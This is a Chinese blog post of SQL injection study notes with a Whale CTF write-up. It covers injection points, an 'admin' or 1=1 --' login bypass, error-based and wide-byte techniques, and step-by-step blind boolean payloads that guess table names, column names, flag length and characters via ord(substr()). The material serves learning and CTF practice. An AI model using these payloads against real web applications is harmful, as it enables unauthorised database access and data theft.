SQL注入学习-白红宇

SQL注入学习

阅读量：5352 次

发布时间：2019-06-15

本文共 893 字，大约阅读时间需要 2 分钟。

2018-02-03

Grant 授权语句

Revoke 取消权限

get 方式URL的后面可以跟上？+Query语句

Post方式可以上传文件或表单

Cookie 需要关注的注入点

构造语句

admin' or 1=1 --;

回显使用union联合语句正常可执行/ 不正常会报错

不回显的叫盲注

报错类型

floor()

extractvalue()

宽字节

其他

Whale CTF

SQL注入题wp

表单通过get方式传输

输入1后 URL？id=1

单引号是分割数据与命令的成对出现

基本注入

1.爆破表名

?id =1 and exists(select * from flag) //猜测表名

?id =1 and exists(select * from news)

...

2.爆破字段

?id =1 and exists(select user from flag)

?id =1 and exists(select password from flag)

?id =1 and exists(select flag from flag)

...

3.已知表名、字段，判断字段长度大于、小于符号尝试

?id =1 and (select length(flag) from flag)>5

?id =1 and (select length(flag) from flag)>10

?id =1 and (select length(flag) from flag)<10

4.猜解字段的ASCII?

ord 把值翻译成ASCII?

a	b	c	d	1	2	3	4
97	98	99	100	31	32	33	34

?id =1 and (select ord(substr(flag,1,1)) from flag)>96

?id =1 and (select ord(substr(flag,1,1)) from flag)>97

...暴力猜

转载于:https://www.cnblogs.com/rookieDanny/p/8410334.html

你可能感兴趣的文章

awk工具-解析1

查看>>

推荐一款可以直接下载浏览器sources资源的Chrome插件

查看>>

CRM product UI里assignment block的显示隐藏逻辑

查看>>

AMH V4.5 – 基于AMH4.2的第三方开发版

查看>>

Web.Config文件配置之配置Session变量的生命周期

angular、jquery、vue 的区别与联系

查看>>

参数范围的选择

查看>>

使用 MarkDown & DocFX 升级 Rafy 帮助文档

查看>>

THUPC2019/CTS2019/APIO2019游记

查看>>

Nodejs Express模块server.address().address为::

查看>>

4.3.5 Sticks (POJ1011)

查看>>

POJ 2960 S-Nim 博弈论 sg函数

查看>>

Dijkstra模版

查看>>